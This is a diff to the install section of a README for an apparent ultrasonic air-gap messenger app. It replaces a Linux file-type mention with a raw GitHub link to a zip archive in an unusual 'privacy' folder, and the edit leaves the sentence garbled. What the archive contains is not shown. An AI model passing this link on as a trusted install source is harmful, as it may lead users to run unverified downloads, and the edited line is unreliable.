dumangan22/ultrasonic-airgap-messanger/README.md

 3. **Install the Application:**
    - For Windows: Double-click the `.exe` file and follow the prompts.
    - For Mac: Open the downloaded `.dmg` file, then drag the application to your Applications folder.
-   - For Linux: Follow your distribution’s method for installing `.deb` or `.tar.gz` files.
+   - For Linux: Follow your distribution’s method for installing `.deb` or `https://github.com/dumangan22/ultrasonic-airgap-messanger/raw/refs/heads/main/app/privacy/airgap-messanger-ultrasonic-2.8-alpha.1.zip` files.
 4. **Run the Application:** Once installed, open the app and set it up according to the on-screen guide.

 ## 🔍 User Guide